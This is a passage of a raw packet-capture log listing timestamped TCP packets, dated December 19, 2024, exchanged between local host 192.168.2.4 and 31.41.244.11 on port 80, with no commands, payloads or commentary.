                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.442660093 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.442667007 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.442701101 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.442701101 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.442704916 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.442764997 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.443272114 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.443327904 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.443331957 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.443348885 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.443365097 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.443380117 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.443396091 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.443423033 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.443428040 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.443454027 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.443469048 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.443485975 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.443500996 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.443502903 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.443516970 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.443535089 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.443541050 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.443542004 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.443552971 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.443582058 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.443582058 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.443608999 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.444214106 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.444300890 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.444508076 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.444524050 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.444539070 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.444555044 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.444566965 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.444566965 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.444572926 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.444588900 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.444591999 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.444611073 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.444614887 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.444614887 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.444627047 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.444644928 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.444645882 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.444645882 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.444662094 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.444663048 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.444689989 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.444700956 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.445205927 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.445290089 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.445367098 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.445384026 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.445400000 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.445415974 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.445421934 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.445421934 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.445431948 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.445442915 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.445451975 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.445461035 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.445477962 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.445477962 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.446417093 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.446433067 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.446446896 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.446464062 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.446472883 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.446480036 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.446481943 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.446497917 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.446516037 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.446535110 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.446543932 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.446553946 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.446559906 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.446577072 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.446624994 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.446624994 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.447112083 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.447129965 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.447173119 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.447173119 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.447247028 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.447274923 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.447297096 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.447319031 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.447330952 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.447330952 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.447330952 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.447335958 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.447354078 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.447370052 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.447371960 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.447371960 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.447387934 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.447387934 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.447400093 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.447405100 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.447422028 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.447468996 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.447469950 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.447959900 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.448019028 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.448149920 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.448167086 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.448183060 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.448196888 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.448199034 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.448216915 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.448225975 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.448225975 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.448232889 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.448256016 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.448256016 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.448262930 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.448277950 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.448280096 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.448297977 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.448314905 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.448333025 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.448338985 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.448338985 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.448349953 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.448395014 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.448395014 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.448901892 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.448919058 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.448945999 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.448961020 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.448961020 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.448961973 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.449013948 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.449120045 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.449137926 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.449177980 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.449198008 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.450009108 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.450066090 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.450148106 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.450221062 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.451108932 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.451175928 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.451198101 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.451217890 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.452227116 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.452331066 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.452354908 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.452402115 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.453320980 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.453428984 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.453444958 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.453515053 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.454482079 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.454538107 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.454613924 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.454694986 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.461076975 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.461122990 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.461173058 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.461173058 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.546956062 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.547405958 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.547491074 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.547595978 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.548055887 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.548239946 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.548371077 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.548564911 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.549446106 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.549612999 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.549662113 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.550473928 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.550525904 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.550569057 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.551470995 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.551533937 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.551551104 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.552042007 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.552485943 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.552561998 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.552611113 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.553396940 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.553513050 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.553591013 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.554490089 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.554614067 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.554620981 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.555727959 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.555782080 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.555813074 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.556194067 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.556792974 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.556879044 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.556931973 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.557810068 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.557909012 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.557977915 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.559061050 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.559096098 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.559112072 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.560033083 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.560046911 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.560127974 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.560132980 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.560190916 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.561168909 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.561259985 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.561305046 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.561357975 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.562328100 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.562377930 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.562391043 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.562443018 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.563353062 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.563453913 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.563481092 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.563554049 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.564444065 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.564575911 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.564631939 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.565587044 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.565689087 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.565761089 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.566658974 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.566736937 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.566771030 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.566900969 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.567950964 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.568000078 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.568043947 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.568882942 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.568938017 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.568981886 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.569978952 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.570063114 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.570095062 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.570146084 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.571091890 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.571265936 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.571332932 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.572366953 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.572428942 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.572523117 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.573303938 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.573380947 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.573425055 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.574417114 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.574466944 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.574539900 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.575524092 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.575551987 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.575588942 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.575588942 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.576616049 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.580055952 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.620886087 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.620970964 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.621155977 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.621450901 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.621535063 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.621686935 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.622560978 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.622612000 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.622673988 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.623693943 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.623788118 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.623811007 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.624089956 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.624772072 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.624885082 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.624936104 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.625878096 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.625973940 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.626075983 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.627005100 CET804986031.41.244.11192.168.2.4
